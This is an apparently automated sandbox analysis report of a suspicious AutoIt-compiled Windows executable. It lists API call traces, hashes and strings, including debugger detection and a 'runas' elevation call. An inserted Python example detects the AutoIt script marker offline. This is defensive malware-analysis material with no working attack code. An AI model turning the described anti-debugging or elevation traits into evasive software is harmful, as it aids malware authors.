• Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B

                                                                                          Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
  • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\XhAQ0Rk63O.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
  • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
• IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
• GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\XhAQ0Rk63O.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
  • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
• SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\XhAQ0Rk63O.exe,00000004), ref: 0040D7D6
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
• SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\XhAQ0Rk63O.exe,00000004), ref: 00431B0E
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\XhAQ0Rk63O.exe,00000004), ref: 00431B3F
• GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
• ShellExecuteW.SHELL32(00000000), ref: 00431B92
  • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
  • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
  • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
  • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
  • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
  • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
  • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
  • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
  • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
  • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
  • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
  • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
  • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                                          • String ID: @GH$@GH$C:\Users\user\Desktop\XhAQ0Rk63O.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                          • API String ID: 2493088469-2787690847
                                                                                          • Opcode ID: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
                                                                                          • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                                          • Opcode Fuzzy Hash: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
                                                                                          • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E

                                                                                          APIs
                                                                                          • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                                          • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                                          • String ID: pMH$Wu
                                                                                          • API String ID: 2923339712-3104548426
                                                                                          • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                          • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                                          • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                          • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: IsThemeActive$uxtheme.dll
                                                                                          • API String ID: 2574300362-3542929980
                                                                                          • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                          • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                                          • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                          • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

                                                                                          APIs
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                                          • __wsplitpath.LIBCMT ref: 00410C61
                                                                                            • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                          • _wcsncat.LIBCMT ref: 00410C78
                                                                                          • __wmakepath.LIBCMT ref: 00410C94
                                                                                            • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                          • _wcscpy.LIBCMT ref: 00410CCC
                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                                          • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                                          • _wcscat.LIBCMT ref: 00429C43
                                                                                          • _wcslen.LIBCMT ref: 00429C55
                                                                                          • _wcslen.LIBCMT ref: 00429C66
                                                                                          • _wcscat.LIBCMT ref: 00429C80
                                                                                          • _wcsncpy.LIBCMT ref: 00429CC0
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                                          • API String ID: 1004883554-2276155026
                                                                                          • Opcode ID: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                                                                                          • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                                          • Opcode Fuzzy Hash: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                                                                                          • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                                                                                          APIs
                                                                                            • Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
                                                                                            • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                          • Sleep.KERNEL32(0000000A), ref: 00409870
                                                                                          • timeGetTime.WINMM ref: 00409880
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuffCharSleepTimeUpper_wcslentime
                                                                                          • String ID:
                                                                                          • API String ID: 3219444185-0
                                                                                          • Opcode ID: da6b74c52f7fd8fa7285d44dc66266380a963bd06260c315e722df216112258b
                                                                                          • Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
                                                                                          • Opcode Fuzzy Hash: da6b74c52f7fd8fa7285d44dc66266380a963bd06260c315e722df216112258b
                                                                                          • Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __fread_nolock$_fseek_wcscpy
                                                                                          • String ID: FILE
                                                                                          • API String ID: 3888824918-3121273764
                                                                                          • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                          • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                                          • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                          • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

                                                                                          APIs
                                                                                          • GetSysColorBrush.USER32 ref: 00410326
                                                                                          • RegisterClassExW.USER32 ref: 00410359
                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                          • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                          • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                          • ImageList_ReplaceIcon.COMCTL32(0092DA18,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                          • API String ID: 2914291525-1005189915
                                                                                          • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                          • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                                          • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                          • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

                                                                                          APIs
                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                          • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                          • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                          • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                          • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                          • RegisterClassExW.USER32 ref: 004102C6
                                                                                            • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                            • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                            • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                            • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                            • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                            • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                            • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(0092DA18,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                          • String ID: #$0$PGH
                                                                                          • API String ID: 423443420-3673556320
                                                                                          • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                          • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                                          • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                          • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • _fseek.LIBCMT ref: 004525DA
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                            • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                            • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                          • __fread_nolock.LIBCMT ref: 00452618
                                                                                          • __fread_nolock.LIBCMT ref: 00452629
                                                                                          • __fread_nolock.LIBCMT ref: 00452644
                                                                                          • __fread_nolock.LIBCMT ref: 00452661
                                                                                          • _fseek.LIBCMT ref: 0045267D
                                                                                          • _malloc.LIBCMT ref: 00452689
                                                                                          • _malloc.LIBCMT ref: 00452696
                                                                                          • __fread_nolock.LIBCMT ref: 004526A7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 1911931848-0
                                                                                          • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                          • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                                          • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                          • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

                                                                                          Control-flow Graph

                                                                                          • Graph not reproduced: entry block 0040F450-0040F45C; the function calls 00425210, 00413990, 00410F70, 004151B0, 0041557C and 004151D0; blocks 00429361-004293C3 belong to the same function.
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __fread_nolock_fseek_strcat
                                                                                          • String ID: AU3!$EA06
                                                                                          • API String ID: 3818483258-2658333250
                                                                                          • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                          • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                                          • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                          • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B
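The function above walks a file with _fseek/__fread_nolock and joins the two report strings "AU3!" and "EA06" with _strcat, which is the signature an AutoIt v3 runtime looks for to find its embedded compiled script. The check below is an added example for this report, not code from the sample or from Joe Sandbox: it performs the same search offline so an AutoIt-compiled wrapper can be recognised at triage time. The 16-byte header value that precedes the marker in a compiled-script resource is taken from public AutoIt extraction tooling and is an assumption here, not something the report shows; the input bytes in the usage are constructed.

```python
"""Offline check for the AutoIt v3 compiled-script marker ("AU3!EA06") in a file.

Added example for this report, not code from the sample or from Joe Sandbox. The
16-byte header checked in front of the marker is the value public AutoIt
extractors key on; it is assumed here, the report itself only shows the marker.
"""
from __future__ import annotations
from pathlib import Path

AU3_MARKER = b"AU3!EA06"
AU3_HEADER = bytes.fromhex("a3484bbe986c4aa9994c530a86d6487d")  # assumed, see lead-in


def find_au3_markers(data: bytes) -> list[int]:
    """Offsets of every AU3!EA06 occurrence; hits cannot overlap, so step past each one."""
    hits: list[int] = []
    pos = data.find(AU3_MARKER)
    while pos >= 0:
        hits.append(pos)
        pos = data.find(AU3_MARKER, pos + len(AU3_MARKER))
    return hits


def classify(data: bytes) -> dict:
    """Report marker offsets and whether any hit carries the expected header in front of it.

    The report lists "AU3!" and "EA06" as separate strings with a _strcat call, so the
    joined marker is assembled at run time rather than stored whole; a bare hit in some
    other binary is therefore treated as inconclusive and only a hit preceded by the
    resource header counts as a compiled script.
    """
    hits = find_au3_markers(data)
    with_header = [
        off for off in hits
        if off >= len(AU3_HEADER) and data[off - len(AU3_HEADER):off] == AU3_HEADER
    ]
    return {
        "marker_offsets": hits,
        "script_offsets": with_header,
        "is_autoit_compiled": bool(with_header),
    }


def classify_file(path: str | Path) -> dict:
    """Convenience wrapper: run classify() over a whole file read from disk."""
    return classify(Path(path).read_bytes())


if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        print(p, classify_file(p))
```

Run it over the sample and over a known-clean AutoIt3 interpreter to see the difference: the interpreter yields marker hits without the header, the wrapped sample yields at least one hit with it, and that offset is where the compressed script begins.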

                                                                                          Control-flow Graph

                                                                                          • Graph not reproduced: entry block 00410130-00410142 (SHGetMalloc); later blocks call SHGetDesktopFolder, SHGetPathFromIDListW and 00411691; blocks 0042944F-00429459 belong to the same function.
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                                          • String ID: C:\Users\user\Desktop\XhAQ0Rk63O.exe
                                                                                          • API String ID: 192938534-1422475815
                                                                                          • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                          • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                                          • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                          • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

                                                                                          Control-flow Graph

                                                                                          • Graph not reproduced: entry block 00401230-0040123B; calls 004131F0 and 00401BE0, then KillTimer and SetTimer at 004012AE-004012BF; five Shell_NotifyIconW call sites in the blocks 0042AA61-0042AB15.
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 00401257
                                                                                            • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                                            • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                                            • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                                            • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                          • KillTimer.USER32(?,?), ref: 004012B0
                                                                                          • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                                          • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                                          • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                                          • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
